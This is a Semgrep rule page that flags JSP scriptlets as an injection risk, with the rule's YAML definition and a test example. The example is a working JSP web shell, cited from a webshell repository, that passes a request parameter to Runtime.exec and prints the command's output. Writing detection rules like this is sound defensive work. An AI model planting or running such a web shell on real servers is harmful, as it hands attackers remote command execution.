java.lang.security.audit.xss.jsp.no-scriptlets.no-scriptlets

profile photo of returntocorpreturntocorp
Author
6,309
Download Count*

JSP scriptlet detected. Scriptlets are difficult to use securely and are considered bad practice. See https://stackoverflow.com/a/3180202. Instead, consider migrating to JSF or using the Expression Language '${...}' with the escapeXml function in your JSP files.

Run Locally

Run in CI

Defintion

rules:
  - id: no-scriptlets
    message: JSP scriptlet detected. Scriptlets are difficult to use securely and
      are considered bad practice. See https://stackoverflow.com/a/3180202.
      Instead, consider migrating to JSF or using the Expression Language
      '${...}' with the escapeXml function in your JSP files.
    metadata:
      owasp:
        - A03:2021 - Injection
      cwe:
        - "CWE-116: Improper Encoding or Escaping of Output"
      references:
        - https://stackoverflow.com/a/3180202
        - https://stackoverflow.com/a/4948856
      category: security
      technology:
        - jsp
      subcategory:
        - audit
      likelihood: LOW
      impact: LOW
      confidence: LOW
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
    pattern-regex: \<\%[^\@].*
    paths:
      include:
        - "*.jsp"
    languages:
      - regex
    severity: WARNING

Examples

no-scriptlets.jsp

<!-- cf. https://github.com/JoyChou93/webshell/blob/4a2f049afe009f9cc061357b002cff78c06d6c43/jsp/cmd.jsp -->
<!-- ok: no-scriptlets -->
<%@ page import="java.util.*,java.io.*"%>
<!-- ruleid: no-scriptlets -->
<% %>
<HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION="">
<INPUT TYPE="text" NAME="comment">
<INPUT TYPE="submit" VALUE="Send">
</FORM> <pre>
<!-- ruleid: no-scriptlets -->
<%
 if ( request.getParameter( "comment" ) != null )
 {
     out.println( "Command: " + request.getParameter( "comment" ) + "<BR>" );
     Process p        = Runtime.getRuntime().exec( request.getParameter( "comment" ) );
     OutputStream os    = p.getOutputStream();
     InputStream in        = p.getInputStream();
     DataInputStream dis    = new DataInputStream( in );
     String disr        = dis.readLine();
     while ( disr != null )
     {
         out.println( disr ); disr = dis.readLine();
     }
 }
 %>
 </pre>
 </BODY></HTML>